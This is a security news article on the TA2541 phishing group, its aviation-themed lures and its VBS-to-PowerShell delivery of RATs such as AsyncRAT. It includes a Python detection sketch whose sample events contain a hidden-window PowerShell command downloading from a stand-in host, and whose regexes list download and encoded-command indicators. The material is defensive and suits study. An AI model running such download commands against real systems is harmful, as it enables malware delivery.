Researchers have observed a hacker group, named TA2541, that stayed hidden for many years without making any major changes in its tactics. This mysterious group has been carrying out phishing and malware attacks since 2017.

About TA2541 and its campaigns

According to researchers at Proofpoint, the group has been using the same tactics since its inception, including remotely controlling victim machines, performing reconnaissance, and stealing important data.
  • The attacks start with phishing emails containing information relevant to the targeted individuals and businesses, using themes related to the transportation, aviation, and aerospace sectors.
  • In one case, the attackers used COVID-19-themed lures, but these weren't highly customized. 
  • Attackers sent these in large numbers with an implied urgency to fool victims into downloading malware. The messages were always in English.

Use of multiple RATs 

Initially, the TA2541 group sent emails with macro-laden Word attachments to download a RAT payload. However, it recently started using OneDrive and Google Drive URLs.
  • The URLs lead to an obfuscated VBS file. Once executed, PowerShell downloads RATs onto Windows systems. 
  • The group has spread dozens of different malware payloads since the campaigns started, all of which were for sale on dark web forums or available in open-source repositories.
  • The most delivered RAT in TA2541 campaigns is AsyncRAT, followed by Parallax, NetWire, and WSH RAT; these were used to gain remote control of machines and steal data.
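
The chain described above (a VBS file run by a Windows script host, which then starts PowerShell to fetch the payload) leaves a recognizable parent/child process pattern. The following is an added detection sketch, not code from Proofpoint or the original article; it assumes Sysmon-style process-creation fields (`Image`, `ParentImage`, `CommandLine`, `ParentCommandLine`), and both the download indicators and the sample events are constructed for illustration.

```python
import re
from ntpath import basename  # splits Windows paths correctly on any OS

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
VBS_RE = re.compile(r"\.vb[se]\b", re.I)
# Assumed indicators: the article does not list the commands the group used.
DOWNLOAD_RE = re.compile(
    r"net\.webclient|download(string|file|data)|invoke-webrequest|\biwr\b"
    r"|start-bitstransfer|https?://", re.I)
# -e, -ec and -en... all resolve to -EncodedCommand, which hides the URL.
ENCODED_RE = re.compile(r"\s-(e|ec|en[a-z]*)\s", re.I)
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

SAMPLE_EVENTS = [  # constructed for this example, not from a real incident
    {"ParentImage": r"C:\Windows\System32\wscript.exe", "Image": PS,
     "ParentCommandLine": r'wscript.exe "C:\Users\a\Downloads\Itinerary.vbs"',
     "CommandLine": "powershell.exe -w hidden Invoke-WebRequest "
                    "https://files.example/x -OutFile x"},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": "powershell.exe Get-ChildItem"},
    {"ParentImage": r"C:\Windows\System32\cscript.exe", "Image": PS,
     "ParentCommandLine": r"cscript.exe //nologo C:\IT\inventory.vbs",
     "CommandLine": r"powershell.exe -NoProfile -File C:\IT\inventory.ps1"},
    {"ParentImage": r"C:\Windows\System32\wscript.exe", "Image": PS,
     "ParentCommandLine": r"wscript.exe C:\Users\b\AppData\Local\Temp\doc.vbs",
     "CommandLine": "powershell.exe -NoP -enc <BASE64_PLACEHOLDER>"},
]

def classify(event):
    """Return (severity, reasons) for one process-creation event, or None."""
    parent = basename(event.get("ParentImage", "")).lower()
    child = basename(event.get("Image", "")).lower()
    if parent not in SCRIPT_HOSTS or child not in POWERSHELL:
        return None
    reasons = [f"{parent} spawned {child}"]
    if VBS_RE.search(event.get("ParentCommandLine", "")):
        reasons.append("parent ran a VBS file")
    cmd = event.get("CommandLine", "")
    fetch, encoded = DOWNLOAD_RE.search(cmd), ENCODED_RE.search(cmd)
    if fetch:
        reasons.append("download indicator in command line")
    if encoded:
        reasons.append("encoded command hides its arguments")
    # Script host -> PowerShell alone is only worth review (admin scripts do
    # it too); a download or an encoded command on top matches the chain.
    return ("high" if fetch or encoded else "medium"), reasons

def detect(events):
    """Return [(index, severity, reasons)] for every matching event."""
    return [(i, *hit) for i, e in enumerate(events) if (hit := classify(e))]
```

The medium tier exists because legitimate administration scripts also launch PowerShell from `cscript.exe`; tune or allowlist those by script path before alerting on them.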

Targeted victims and regions

The group has targeted hundreds of organizations in multiple regions, including Europe, the Middle East, and North America. It targeted the aviation, transportation, defense, manufacturing, and aerospace industries.


The TA2541 group stayed hidden for almost five years, exhibiting its sophisticated evasion skills. The campaigns are still active and spreading phishing emails to target victims around the world.
Cyware Publisher